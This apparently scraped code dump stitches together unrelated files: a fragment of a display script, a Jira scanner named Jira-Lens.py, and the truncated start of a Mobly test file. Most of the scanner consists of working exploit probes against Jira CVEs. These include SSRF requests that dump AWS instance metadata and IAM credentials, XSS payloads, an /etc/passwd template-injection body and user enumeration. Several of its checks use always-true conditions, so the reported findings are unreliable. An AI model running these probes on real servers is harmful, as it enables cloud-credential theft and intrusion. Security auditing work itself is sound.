_fake_write_screen(line1, line2, line3)
time.sleep(2)
#Get a list of three-line tuples containing interface
#data and print(them all
ifaces_screens = dot3kdata.iface_info()
for iface in ifaces_screens:
#_write_screen(iface[0], iface[1], iface[2])
_fake_write_screen(iface[0], iface[1], iface[2])
time.sleep(2)
#Start the signal handler for SIGINT
signal.signal(signal.SIGINT, signal_handler)
#Drive the dothat
lights = threading.Thread(target=run_lights,args=())
text = threading.Thread(target=run_text,args=())
lights.start()
text.start()
|
Jira-Lens.py
|
import sys
import progressbar
import json
import requests
import socket
import threading
import os
import time
from urllib.parse import urlparse
from config import *
import argparse
def clean_url(url):
while url.endswith("/"):
url=url[0:-1]
return url
def detect_version(base_url):
r=requests.get(f"{base_url}/rest/api/latest/serverInfo",allow_redirects=False,headers=headers)
try:
server_data=json.loads(str(r.content,'utf-8'))
print('\n')
print(f"\t{GREEN}-------- Server Information -----------{RESET}")
print("\n")
print(f"{DIM}{MAGENTA} [*] URL --> ",server_data.get("baseUrl"))
print(f"{DIM_RESET} [*] Server Title --> ",server_data.get("serverTitle"))
print(" [*] Version --> " ,server_data.get("version"))
print(" [*] Deployment Type --> ",server_data.get("deploymentType"))
print(" [*] Build Number --> ",server_data.get("buildNumber"))
print(" [*] Database Build Number --> ",server_data.get("databaseBuildNumber"))
try:
print(" [*] Host Address -->",socket.gethostbyaddr(urlparse(base_url).netloc)[0])
except:
print(" [*] Host Address --> Error While Resolving Host")
try:
print(" [*] IP Address -->",socket.gethostbyaddr(urlparse(base_url).netloc)[2][0])
print("\n")
except:
print(" [*] IP Address --> Error While Resolving IP Address")
print("\n")
except KeyboardInterrupt:
print (f"{RED} Keyboard Interrupt Detected {RESET}")
sys.exit(0)
except Exception as e:
print(f"{RED}An Unexpected Error Occured:{RESET} {e}")
def isaws(base_url):
try:
if "amazonaws" in socket.gethostbyaddr(urlparse(base_url).netloc)[0]:
return True
else:
return False
except:
None
''' Different CVE's Defined For Scanning. Add New CVE's Here '''
def CVE_2017_9506(base_url): #(SSRF):
to_load="https://google.com"
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}",allow_redirects=False,headers=headers)
if r.status_code==200 and "googlelogo" in str(r.content):
print(f"{RED}[+] {GREEN} [CRITICAL] {RESET} Vulnerable To CVE-2017-9506 (SSRF) : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}\n")
response.append(f"[+] [CRITICAL] Vulnerable To CVE-2017-9506 (SSRF) : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}\n")
print("\tChecking For AWS Metadata Extraction\n")
if is_aws:
print("\tAWS Instance Found")
print("\tExfiltrating Data from the Insatance")
to_load="http://169.254.169.254/latest/meta-data/"
print("\n\tDUMPING AWS INSTANCE DATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_INSTANCE}",allow_redirects=False,headers=headers)
aws_instance=str(r.content,'utf-8')
if r.status_code == 200:
print(f"\tAWS INSTANCE Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_INSTANCE}")
print("\n\tDUMPING AWS METADATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_METADATA}",allow_redirects=False,headers=headers)
aws_metadata=str(r.content,'utf-8')
if r.status_code == 200:
print(f"\tAWS Metadata Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_METADATA}")
print("\n\tDUMPING AWS IAM DATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_IAM_DATA}",allow_redirects=False,headers=headers)
aws_iam_data=str(r.content,'utf-8')
if r.status_code == 200:
print(f"\tAWS IAM DATA Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_IAM_DATA}\n")
filename=f"CVE-2017-9506_{urlparse(url).netloc}.txt"
with open(f"{output_folder}{filename}",'a') as cve_file:
cve_file.write(aws_instance)
cve_file.write(aws_metadata)
cve_file.write(aws_iam_data)
print(f"\tExfiltrated Data Written to [CVE-2017-9506_{urlparse(url).netloc}.txt]\n\n ")
to_load="http://100.100.100.200/latest/meta-data/"
print("\tChecking for Alibaba Metadata Exfiltration")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\t----> Alibaba Metadata Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}")
to_load="http://127.0.0.1:2375/v1.24/containers/json"
print("\tChecking for Docker Container Lists")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\t----> Docker Lists Found : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}")
to_load="http://127.0.0.1:2379/v2/keys/?recursive=true"
print("\tChecking Kubernetes ETCD API keys")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\t-----> Kubernetes ETCD API keys Found : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2017-9506")
def CVE_2019_8449(base_url): # User Info Disclosure:
r=requests.get(f"{base_url}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true",allow_redirects=False,headers=headers)
#print(str(r.content))
if r.status_code==200:
if "You are not authenticated. Authentication required to perform this operation." in str(r.content):
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-8449\n")
else:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2019-8449 : {base_url}/rest/pi/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2019-8449 : {base_url}/rest/pi/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-8449\n")
def CVE_2019_8442(base_url): #(Sensitive info disclosure):
r=requests.get(f"{base_url}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml", allow_redirects=False,headers=headers)
if r.status_code != 200:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-8442\n")
else:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2019-8442 : {base_url}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2019-8442 : {base_url}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n")
def CVE_2019_8443(base_url): #(Sensitive info disclosure):
r=requests.get(f"{base_url}/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml", allow_redirects=False,headers=headers)
if r.status_code == 200 or "<project" in str(r.content):
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2019-8443 : {base_url}/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2019-8443 : {base_url}/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-8443\n")
def CVE_2019_8451(base_url): #(SSRF):
to_load="https://google.com"
r=requests.get(f"{base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}",allow_redirects=False,headers=headers)
if r.status_code==200 and "googlelogo" in str(r.content):
print(f"{RED}[+] {GREEN} [CRITICAL]{RESET} Vulnerable To CVE-2019-8451 (SSRF) : {base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}\n")
response.append(f"[+] [CRITICAL] Vulnerable To CVE-2019-8451 (SSRF) : {base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}\n")
print("\tChecking For AWS Metadata Extraction\n")
if is_aws:
print("\tAWS Instance Found")
print("\tExfiltrating Data from the Insatance")
to_load="http://169.254.169.254/latest/meta-data/"
print("\nDUMPING AWS INSTANCE DATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_INSTANCE}",allow_redirects=False,headers=headers)
aws_instance=str(r.content,'utf-8')
if r.status_code == 200:
print(f"\tAWS INSTANCE Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_INSTANCE}")
print("\n\tDUMPING AWS METADATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_METADATA}",allow_redirects=False,headers=headers)
aws_metadata=str(r.content,'utf-8')
if r.status_code == 200:
print(f"AWS Metadata Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_METADATA}")
print("\n\tDUMPING AWS IAM DATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_IAM_DATA}",allow_redirects=False,headers=headers)
aws_iam_data=str(r.content,'utf-8')
if r.status_code == 200:
print(f"\tAWS IAM DATA Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_IAM_DATA}\n")
filename=f"CVE-2019-8451_{urlparse(url).netloc}.txt"
with open(f"{output_folder}{filename}",'a') as cve_file:
cve_file.write(aws_instance)
cve_file.write(aws_metadata)
cve_file.write(aws_iam_data)
print(f"\tExfiltrated Data Written to [CVE-2019-8451_{urlparse(url).netloc}.txt] \n\n")
to_load="http://100.100.100.200/latest/meta-data/"
print("\tChecking for Alibaba Metadata Exfiltration")
r=requests.get(f"{base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\tAlibaba Metadata Recovered : {base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}")
to_load="http://127.0.0.1:2375/v1.24/containers/json"
print("\tChecking for Docker Container Lists")
r=requests.get(f"{base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\tDocker Lists Found : {base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}")
to_load="http://127.0.0.1:2379/v2/keys/?recursive=true"
print("\tChecking Kubernetes ETCD API keys\n")
r=requests.get(f"{base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\tKubernetes ETCD API keys Found : {base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-8451\n")
def CVE_2019_3403(base_url): #(User enum):
r=requests.get(f"{base_url}/rest/api/2/user/picker?query=admin", allow_redirects=False,headers=headers)
#print(str(r.content))
if "The user named \'{0}\' does not exist" or "errorMessages" in str(r.content):
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-3403\n")
else:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2019-3403 : {base_url}/rest/api/2/user/picker?query=admin\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2019-3403 : {base_url}/rest/api/2/user/picker?query=admin\n")
def CVE_2019_3402(base_url): #XSS in the labels gadget:
r=requests.get(f"{base_url}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(\"XSS\")%3C%2fscript%3Et1nmk&Search=Search", allow_redirects=False,headers=headers)
if "XSS" in str(r.content):
print(f"{RED}[+] {GREEN} [HIGH]{RESET} Vulnerable To CVE-2019-3402 [Maybe] : {base_url}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(\"XSS\")%3C%2fscript%3Et1nmk&Search=Search\n")
response.append(f"[+] [HIGH] Vulnerable To CVE-2019-3402 [Maybe] {base_url}/secure/ConfigurePortal: {base_url}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(\"XSS\")%3C%2fscript%3Et1nmk&Search=Search\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-3402\n")
def CVE_2019_11581(base_url): #(SSTI):
r=requests.get(f"{base_url}/secure/ContactAdministrators!default.jspa", allow_redirects=False)
if r.status_code==200:
if "Your Jira administrator" or "Contact Site Administrators" in str(r.content):
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-11581\n")
else:
print(f"{RED}[+] {GREEN} [CRITICAL]{RESET} Vulnerable To CVE-2019-11581 [Confirm Manually] : {base_url}/secure/ContactAdministrators!default.jspa\n")
response.append(f"[+] [CRITICAL] Vulnerable To CVE-2019-11581 [Confirm Manually] : {base_url}/secure/ContactAdministrators!default.jspa\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-11581\n")
def CVE_2020_14179(base_url): #(Info disclosure):
r=requests.get(f"{base_url}/secure/QueryComponent!Default.jspa",allow_redirects=False,headers=headers)
if r.status_code != 200:
print(f"{GRAY}[-] Not Vulnerable To CVE-2020-14179\n")
else:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2020-14179 : {base_url}/secure/QueryComponent!Default.jspa\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2020-14179 : {base_url}/secure/QueryComponent!Default.jspa\n")
def CVE_2020_14181(base_url): #(User enum):
r=requests.get(f"{base_url}/secure/ViewUserHover.jspa?username=Admin",allow_redirects=False,headers=headers)
if r.status_code !=200 or "Your session has timed out" in str(r.content):
print(f"{GRAY}[-] Not Vulnerable To CVE-2020-14181\n")
else:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2020-14181 : {base_url}/secure/ViewUserHover.jspa?username=Admin\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2020-14181 : {base_url}/secure/ViewUserHover.jspa?username=Admin\n")
def CVE_2018_20824(base_url): #(XSS):
print("\n")
r=requests.get(f"{base_url}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(\"XSS_POPUP\")",allow_redirects=False,headers=headers)
if "XSS_POPUP" in str(r.content):
print(f"{RED}[+] {GREEN} [HIGH]{RESET} Vulnerable To CVE-2018-20824 : {base_url}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n")
response.append(f"[+] [HIGH] Vulnerable To CVE-2018-20824 : {base_url}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2018-20824\n")
def CVE_2019_3396(base_url): #(Path Traversal & RCE):
body = ' {"contentId":"1","macro":{"name":"widget","params":{"url":"https://google.com","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}} '
r=requests.get(f"{base_url}/rest/tinymce/1/macro/preview", allow_redirects=False,headers=headers)
if r.status_code != 200:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-3396\n")
else:
r=requests.post(f"{base_url}/rest/tinymce/1/macro/preview", data=body,headers=headers)
if "root" in str(r.content):
print(f"{RED}[+] {GREEN} [CRITICAL]{RESET} Vulnerable To CVE-2019-3396 : {base_url}/rest/tinymce/1/macro/preview\n")
response.append(f"{RED}[+] [CRITICAL] Vulnerable To CVE-2019-3396 : {base_url}/rest/tinymce/1/macro/preview\n")
def CVE_2020_36287(base_url,ii):
try:
r=requests.get(f"{base_url}/rest/dashboards/1.0/10000/gadget/{ii}/prefs")
if r.status_code==200:
if "userPrefsRepresentation" in str(r.content):
response_CVE_2020_36287.append(f"{base_url}/rest/dashboards/1.0/10000/gadget/{ii}/prefs\n")
except:
pass
def CVE_2020_36287_helper(base_url):
widgets = ['BruteForcing Gagdet ID... ', progressbar.AnimatedMarker()]
bar = progressbar.ProgressBar(widgets=widgets).start()
for i in range(50):
time.sleep(0.1)
bar.update(i)
with open('helper.txt','a') as no:
for i in range(10000,10500):
no.write(str(i)+'\n')
with open('helper.txt','r') as op:
threads=[]
for num in op:
t=threading.Thread(target=CVE_2020_36287,args=(base_url,num.strip()))
t.start()
threads.append(t)
for tt in threads:
tt.join()
if len(response_CVE_2020_36287) != 0:
filename=f"CVE-2020-36287_{urlparse(url).netloc}.txt"
with open(f"{output_folder}{filename}",'a') as res:
for i in range(0,len(response_CVE_2020_36287)):
res.write(response_CVE_2020_36287[i])
else:
pass
os.remove("helper.txt")
def CVE_2020_36287_helper_2():
if len(response_CVE_2020_36287) != 0:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2020-36287\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2020-36287 : File Written at [CVE-2020-36287_{urlparse(url).netloc}.txt]\n")
print(f"\n\tFound Dashboard Gadegts\n\tWritten To File [CVE-2020-36287_{urlparse(url).netloc}.txt]\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2020-36287\n")
def CVE_2020_36289(base_url):
r=requests.get(f"{base_url}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin")
#print("\n")
if r.status_code ==200:
if "Assignee" in str(r.content):
print(f"{RED}[+] {GREEN} [MEDIUM] {RESET}Vulnerable To CVE-2020-36289 : {base_url}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin\n")
response.append(f"[+] [MEDIUM] Vulnerable To CVE-2020-36289 : {base_url}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE 2020 36289\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE 2020 36289\n")
''' Different Disclosures Defined For Scanning . Add New Disclosures Here'''
def user_reg(base_url):
try:
r=requests.get(f"{base_url}/secure/Signup!default.jspa",allow_redirects=False)
if r.status_code ==200:
if "private" in str(r.content):
print(f"{GRAY}[-] User regestration is Disabled{RESET}\n")
else:
print(f"{RED}[+] {GREEN}[Medium]{RESET} User regestration is Enabled : {base_url}/secure/Signup!default.jspa\n")
response.append(f"[+] [Medium] User regestration is Enabled : {base_url}/secure/Signup!default.jspa\n")
else:
print(f"{GRAY}[-] User regestration is Disabled{RESET}\n")
except KeyboardInterrupt:
print(f"{RED} User Aborted the Program {RESET}")
def dev_mode(base_url):
r=requests.get(f"{base_url}/",allow_redirects=False)
if r.status_code ==200:
if "<meta name=\"ajs-dev-mode\" content=\"true\">" in str(r.content):
print(f"{RED}[+] {GREEN} [LOW]{RESET} Dev Mode is Enabled : {base_url}/ {RESET}\n")
response.append(f"[+] [LOW] Dev Mode is Enabled : {base_url}/ {RESET}\n")
else:
print(f"{GRAY}[-] Dev Mode is Disabled{RESET}\n")
else:
print(f"{GRAY}[-] Dev Mode is Disabled{RESET}\n")
def Unauth_User_picker(base_url):
r=requests.get(f"{base_url}/secure/popups/UserPickerBrowser.jspa",allow_redirects=False,headers=headers)
if r.status_code != 200:
print(f"{GRAY}[-] User Picker Disabled{RESET}\n")
else:
if "user-picker" in str(r.content):
print(f"{RED}[+] {CYAN}[INFO]{RESET} User Picker Enabled : {base_url}/secure/popups/UserPickerBrowser.jspa?max=1000\n")
response.append(f"[+] [INFO] User Picker Enabled : {base_url}/secure/popups/UserPickerBrowser.jspa?max=1000\n")
def Unauth_Group_Picker(base_url):
r=requests.get(f"{base_url}/rest/api/2/groupuserpicker", allow_redirects=False,headers=headers)
if r.status_code ==200:
if "You are not authenticated. Authentication required to perform this operation." in str(r.content):
print(f"{GRAY}[-] REST GroupUserPicker is not available\n")
else:
print(f"{RED}[+] {CYAN}[INFO]{RESET} REST GroupUserPicker is available : {base_url}/rest/api/2/groupuserpicker\n")
response.append(f"[+] [INFO] REST GroupUserPicker is available : {base_url}/rest/api/2/groupuserpicker\n")
else:
#print(f"{RED}Unable To Connect . [Status :"+str({r.status_code})+"]")
print(f"{GRAY}[-] REST GroupUserPicker is not available\n")
def Unauth_Resolutions(base_url):
r=requests.get(f"{base_url}/rest/api/2/resolution",allow_redirects=False,headers=headers)
if r.status_code ==200:
if 'self' or 'description' or 'name' in str(r.content):
print(f"{RED}[+] {CYAN} [INFO] {RESET} Resolutions Found : {base_url}/rest/api/2/resolution\n")
response.append(f"[+] [INFO] Resolutions Found : {base_url}/rest/api/2/resolution\n")
else:
print(f"{GRAY}[-] No Resolutions Found\n")
else:
print(f"{GRAY}[-] No Resolutions Found\n")
def Unauth_Projects(base_url):
r=requests.get(f"{base_url}/rest/api/2/project?maxResults=100",allow_redirects=False,headers=headers)
if r.status_code ==200:
if 'projects' and 'startAt' and 'maxResults' in str(r.content):
print(f"{RED}[+] {GREEN}[LOW] {RESET}Projects Found : {base_url}/rest/api/2/project?maxResults=100\n")
response.append(f"[+] [LOW] Projects Found : {base_url}/rest/api/2/project?maxResults=100\n")
else:
print(f"{GRAY}[-] Projects Not Found\n")
else:
print(f"{GRAY}[-] Projects Not Found\n")
def Unauth_Project_categories(base_url):
r=requests.get(f"{base_url}/rest/api/2/projectCategory?maxResults=1000",allow_redirects=False,headers=headers)
if r.status_code ==200:
if 'self' or 'description' or 'name' in str(r.content):
print(f"{RED}[+] {GREEN}[LOW]{RESET} Project Groups Found : {base_url}/rest/api/2/projectCategory?maxResults=1000\n")
response.append(f"[+] [LOW] Project Groups Found : {base_url}/rest/api/2/projectCategory?maxResults=1000\n")
else:
print(f"{GRAY}[-] Project Groups Not Found{RESET}\n")
else:
print(f"{GRAY}[-] Project Groups Not Found{RESET}\n")
def Unauth_Dashboard(base_url):
r=requests.get(f"{base_url}/rest/api/2/dashboard?maxResults=100",allow_redirects=False,headers=headers)
if r.status_code ==200:
if 'dashboards' and 'startAt' and 'maxResults' in str(r.content):
print(f"{RED}[+] {CYAN}[INFO]{RESET} Found Unauthenticated DashBoard Access{RESET} : {base_url}/rest/api/2/dashboard?maxResults=100\n")
response.append(f"[+] [INFO] Found Unauthenticated DashBoard Access : {base_url}/rest/api/2/dashboard?maxResults=100\n")
else:
print(f"{GRAY}[-] No Unauthenticated DashBoard Access Found{RESET}\n")
else:
print(f"{GRAY}[-] No Unauthenticated DashBoard Access Found{RESET}\n")
def Unauth_Dashboard_Popular(base_url):
r=requests.get(f"{base_url}/secure/ManageFilters.jspa?filter=popular&filterView=popular",allow_redirects=False,headers=headers)
if r.status_code ==200:
if 'Popular Filters' in str(r.content):
print(f"{RED}[+] {CYAN}[INFO]{RESET} Filters Accessible : {base_url}/secure/ManageFilters.jspa?filter=popular&filterView=popular\n")
response.append(f"[+] [INFO] Filters Accessible : {base_url}/secure/ManageFilters.jspa?filter=popular&filterView=popular\n")
else:
print(f"{GRAY}[-] Filters Not Accessible{RESET}\n")
else:
print(f"{GRAY}[-] Filters Not Accessible{RESET}\n")
def Unauth_Dashboard_admin(base_url):
r=requests.get(f"{base_url}/rest/menu/latest/admin",allow_redirects=False,headers=headers)
if r.status_code ==200:
if 'key' and 'link' and 'label' and 'self' in str(r.content):
print(f"{RED}[+] {CYAN}[INFO] {RESET} Admin Project Dashboard Accessible : {base_url}/rest/menu/latest/admin\n")
response.append(f"[+] [INFO] Admin Project Dashboard Accessible : {base_url}/rest/menu/latest/admin\n")
else:
print(f"{GRAY}[-] Admin Project Dashboard UnAccessible\n")
else:
print(f"{GRAY}[-] Admin Project Dashboard UnAccessible\n")
def Service_desk_signup(base_url):
body='{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}'
r=requests.get(f"{base_url}/servicedesk/customer/user/signup",allow_redirects=False,headers=headers)
if r.status_code ==200 :
if "Service Management" in str(r.content):
print(f"{RED}[+] {GREEN}[MEDIUM]{RESET} Service Desk Signup Enabled : {base_url}/servicedesk/customer/user/signup{RESET}\n")
response.append(f"[+] [MEDIUM] Service Desk Signup Enabled : {base_url}/servicedesk/customer/user/signup\n")
else:
print(f"{GRAY}[-] Service Desk Signup Disabled{RESET}\n")
def Unauth_Install_Gadgets(base_url):
r=requests.get(f"{base_url}/rest/config/1.0/directory")
if r.status_code ==200 :
if "jaxbDirectoryContents" in str(r.content):
print(f"{RED}[+] {GREEN}[LOW]{RESET} REST Gadegts Accessible : {base_url}/rest/config/1.0/directory{RESET}\n")
response.append(f"[+] [LOW] REST Gadegts Accessible : {base_url}/rest/config/1.0/directory\n")
else:
print(f"{GRAY}[-] REST Gadegts UnAccessible\n")
def FieldNames_QueryComponentJql(base_url):
r=requests.get(f"{base_url}/secure/QueryComponent!Jql.jspa?jql=",allow_redirects=False,headers=headers)
if r.status_code ==200:
if "searchers" in str(r.content):
print(f"{RED}[+] {GREEN}[LOW] {RESET}Found Query Component Fields : {base_url}/secure/QueryComponent!Jql.jspa?jql=\n")
response.append(f"[+] [LOW] Found Query Component Fields : {base_url}/secure/QueryComponent!Jql.jspa?jql=\n")
else:
print(f"{GRAY}[-] No Query Component Fields Found{RESET}\n")
else:
print(f"{GRAY}[-] No Query Component Fields Found{RESET}\n")
def Unauth_Screens(base_url):
r=requests.get(f"{base_url}/rest/api/2/screens",allow_redirects=False)
if r.status_code==200:
if "id" or "name" or "description" in str(r.content):
print(f"{RED}[+] {GREEN}[LOW] {RESET} Unauthenticated Access To Screens : {base_url}/rest/api/2/screens\n")
response.append(f"[+] [LOW] Unauthenticated Access To Screens : {base_url}/rest/api/2/screens\n")
else:
print(f"{GRAY}[-] No Unauthenticated Access To Screens Found{RESET}\n")
else:
print(f"{GRAY}[-] No Unauthenticated Access To Screens Found{RESET}\n")
def write_response(response):
filename=f"Jira-Lens_{urlparse(url).netloc}.txt"
with open(f"{output_folder}{filename}",'a') as final:
for items in response:
final.write(items)
final.write("\n")
print(f"\n\n\n\t{RED}File Written to : Jira-Lens_{urlparse(url).netloc}.txt{RESET}\n")
def worker(url):
try:
base_url=clean_url(url)
detect_version(base_url)
is_aws=isaws(base_url)
CVE_2017_9506(base_url)
CVE_2018_20824(base_url)
CVE_2019_3402(base_url)
CVE_2019_3403(base_url)
CVE_2019_3396(base_url)
CVE_2019_8442(base_url)
CVE_2019_8443(base_url)
CVE_2019_8449(base_url)
CVE_2019_8451(base_url)
CVE_2019_11581(base_url)
CVE_2020_14179(base_url)
CVE_2020_14181(base_url)
CVE_2020_36287_helper(base_url)
CVE_2020_36287_helper_2()
CVE_2020_36289(base_url)
Unauth_User_picker(base_url)
Unauth_Resolutions(base_url)
Unauth_Projects(base_url)
Unauth_Project_categories(base_url)
Unauth_Dashboard(base_url)
Unauth_Dashboard_admin(base_url)
Service_desk_signup(base_url)
Unauth_Install_Gadgets(base_url)
user_reg(base_url)
Unauth_Group_Picker(base_url)
Unauth_Screens(base_url)
FieldNames_QueryComponentJql(base_url)
write_response(response)
except KeyboardInterrupt:
print (f"{RED} Keyboard Interrupt Detected {RESET}")
sys.exit(0)
except Exception as e:
print(f"{RED}An Unexpected Error Occured : {RESET} {e}")
def main():
try:
global url
global output_folder
global is_aws
global base_url
parser = argparse.ArgumentParser(description="Jira-Lens : Jira Security Auditing Tool")
parser.add_argument("-u","--url", help="Target URL",dest='url')
parser.add_argument('-f','--file',type=argparse.FileType('r'),dest='input_file')
parser.add_argument('-c','--cookie',help="Provide authentication cookie(s)")
parser.add_argument('-o','--output',help="Output Folder for files",default="output/",required=False)
args= parser.parse_args()
banner()
url=args.url
output_folder=args.output
if os.path.isdir(output_folder)==False:
print(f"\t{RED}The Output Path {output_folder} does not Exist")
sys.exit(1)
if args.url == None and args.input_file==None:
print(f"{RED}\tNo URL Provided\n\tUse -u/--url to provide an URL")
sys.exit(0)
if args.url != None and args.input_file!=None:
print(f"{RED}\tMultiple Inputs Provided\n\tUse Either -u(URL) or -f(FILE) as Input")
sys.exit(0)
if args.cookie:
headers['Cookie'] = args.cookie
if args.input_file:
print(f" {CYAN}Input File Provided : {args.input_file.name}{RESET}\n\n")
input_file=args.input_file.name
uselesscounter=True
with open(input_file,'r') as urls_file:
for url in urls_file.readlines():
if url.strip() not in unq_url:
unq_url.append(url.strip())
with open(input_file,'r') as urls_file:
for url in urls_file.readlines():
if uselesscounter:
print(f" {CYAN}{len(unq_url)} Unique Urls Found{RESET}")
uselesscounter=False
url=url.strip()
worker(url)
else:
url=args.url
worker(url)
except KeyboardInterrupt:
print (f"{RED} Keyboard Interrupt Detected {RESET}")
sys.exit(0)
except Exception as e:
print(f"{RED}An Unexpected Error Occured:{RESET} {e}")
if __name__=="__main__":
try:
response_CVE_2020_36287=[]
unq_url=[]
response=[]
global is_aws
global url
main()
except KeyboardInterrupt:
print (f"{RED} Keyboard Interrupt Detected {RESET}")
sys.exit(0)
except Exception as e:
print(f"{RED}An Unexpected Error Occured:{RESET} {e}")
|
utils_test.py
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from concurrent import futures
import io
import logging
import multiprocessing
import os
import platform
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from unittest import mock
from mobly import base_test
from mobly import signals
from mobly import test_runner
from mobly import utils
from tests.lib import integration_test
from tests.lib import mock_controller
from tests.lib import mock_instrumentation_test
from tests.lib import multiple_subclasses_module
MOCK_AVAILABLE_PORT = 5
ADB_MODULE_PACKAGE_NAME = 'mobly.controllers.android_device_lib.adb'
def _is_process_running(pid):
"""Whether the process with given PID is running."""
if os.name == 'nt':
return str(pid) in subprocess.check_output([
'tasklist',
'/fi',
f'PID eq {pid}',
]).decode()
try:
